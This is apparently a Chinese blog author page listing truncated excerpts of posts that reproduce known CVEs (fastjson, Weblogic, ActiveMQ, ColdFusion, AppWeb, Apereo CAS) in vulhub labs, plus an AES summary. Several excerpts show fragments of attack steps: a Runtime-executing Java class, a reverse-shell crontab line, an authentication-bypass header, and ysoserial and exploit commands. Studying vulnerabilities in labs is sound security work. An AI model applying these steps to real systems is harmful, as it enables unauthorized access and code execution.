自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(10)
  • 收藏
  • 关注

转载 AES加密简单总结

AES加密简单总结分组密码就是把明文分成一组一组的,且每组等长,均为128位(16个字节)密钥的长度影响的是加密的轮次(10,12,14)(以下加密过程以128位密钥,加密10轮开展说明)加密其实就是通过函数对明文进行计算10轮的加密则是前9次执行相同的函数(这个函数可以拆分为4步,①字节替换,②行位移,③列混合,④轮密钥加)最后1轮执行另一个函数(实际就是少了一个步骤,不执行’列混合’)。首先,将分组后的明文P(128位)和密钥K(128位)进行拆分为16个字节,p0-p

2021-11-29 10:28:21 355

原创 Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)环境搭建漏洞利用反弹shell环境搭建使用vulhub进行环境搭建,具体步骤可参考这里。漏洞利用环境启动成功,访问http://192.168.36.128:8500/CFIDE/administrator/index.cfm,输入密码vulhub,即可成功安装Adobe ColdFusion输入密码后,点击OK,页面如下:需下载内容ColdFusionPwn-0.0.1-SNAPSHOT-all.j

2021-04-13 17:48:12 407

原创 AppWeb认证绕过漏洞(CVE-2018-8715)

AppWeb认证绕过漏洞(CVE-2018-8715)环境搭建漏洞验证环境搭建使用vulhub进行环境搭建,具体步骤可参考这里。漏洞验证首先访问搭建好的环境时,页面信息如下:输入任意用户名密码后,点击登录,显示无权限:更改请求头中的Authorization为Authorization: Digest username=admin,即可在响应包中得到session:可以修改浏览器中的cookie值,从而进行未授权访问:...

2021-04-11 13:42:26 115

原创 fastjson<=1.2.47反序列化漏洞复现

fastjson<=1.2.47反序列化漏洞复现环境搭建漏洞复现环境搭建漏洞复现创建一个java类:TouchFile.java// javac TouchFile.javaimport java.lang.Runtime;import java.lang.Process;public class TouchFile { static { try { Runtime rt = Runtime.getRuntime();

2020-09-29 13:52:48 359

原创 Apache ActiveMQ任意文件写入代码执行漏洞复现(CVE-2016-3088)

Apache ActiveMQ任意文件写入代码执行漏洞复现(CVE-2016-3088)环境搭建漏洞验证环境搭建使用vulhub进行环境搭建,具体步骤可参考这里。漏洞验证将文件上传使用PUT方法放到fileserver目录下,服务器响应204即代码上传成功。将刚刚上传的文件MOVE到admin或api应用中,但是这两个应用都需要登录才能访问到登录后访问下面这个方法更稳定一些,可以在fileserver目录下写入如下内容:*/1 * * * * root /usr/bin

2020-09-22 13:32:33 419

原创 Weblogic XMLDecoder 反序列化漏洞复现(CVE-2017-10271)

Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)环境搭建漏洞验证反弹shellPOC上传文件POC环境搭建使用vulhub进行环境搭建,具体步骤可参考这里。启动成功漏洞验证访问http://IP:PORT/wls-wsat/CoordinatorPortType11,在挖洞的时候访问此地址出现如下页面则大概率都是存在这个漏洞的反弹shellPOCPOST /wls-wsat/CoordinatorPortType HTTP/1.1Host: X.X.

2020-09-21 16:56:57 1050

原创 使用vulhub进行漏洞环境搭建

使用vulhub进行漏洞环境搭建下载vulhub环境启动下载vulhubvulhub下载地址: https://github.com/vulhub/vulhub命令:git clone https://github.com/vulhub/vulhub下载完成后可以查看里面有很多漏洞的环境,想用哪个就用哪个,超级方便~每个漏洞里面都有详细的介绍:环境启动命令:docker-compose up -d启动之后就具备相应的漏洞环境啦,接下来就可以复现漏洞命令详解docke

2020-09-21 13:47:22 1137

原创 Weblogic反序列化漏洞复现(CVE-2018-2628)

Weblogic反序列化漏洞(CVE-2018-2628环境搭建工具准备漏洞复现环境搭建使用vulhub进行环境搭建,具体的步骤可以自行百度工具准备下载ysoserial,为了启动JRMP ServerEXP地址:https://www.exploit-db.com/exploits/44553漏洞复现使用namp查看是否启用T3协议:nmap -p 7001,7002 -T4 -A -v --script weblogic-t3-info 192.168.120.161启动JRMP Se

2020-09-21 10:10:12 960

原创 Apereo CAS 4.1.X 反序列化漏洞复现

Apereo CAS 反序列化漏洞环境搭建漏洞复现影响范围: Apereo CAS <= 4.1.7工具下载:https://github.com/vulhub/Apereo-CAS-Attack/releases环境搭建使用vulhub进行环境搭建漏洞复现使用ysoserial的CommonsCollections4生成加密后的Payload:java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 “

2020-09-20 10:13:44 966

原创 Apache ActiveMQ序列化漏洞复现(CVE-2015-5254)

这里写自定义目录标题1.环境搭建1.1 下载vulhub1.1 启动环境2.漏洞复现2.1 下载EXP2.2 执行命令1.环境搭建1.1 下载vulhub wget https://github.com/vulhub/vulhub1.1 启动环境 cd /vulhub/activemq/CVE-2015-5254 docker-compose up -d查看本机IP地址:截止到此处,环境搭建完成。2.漏洞复现2.1 下载EXP下载地址:https://gi

2020-09-19 14:53:57 167

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除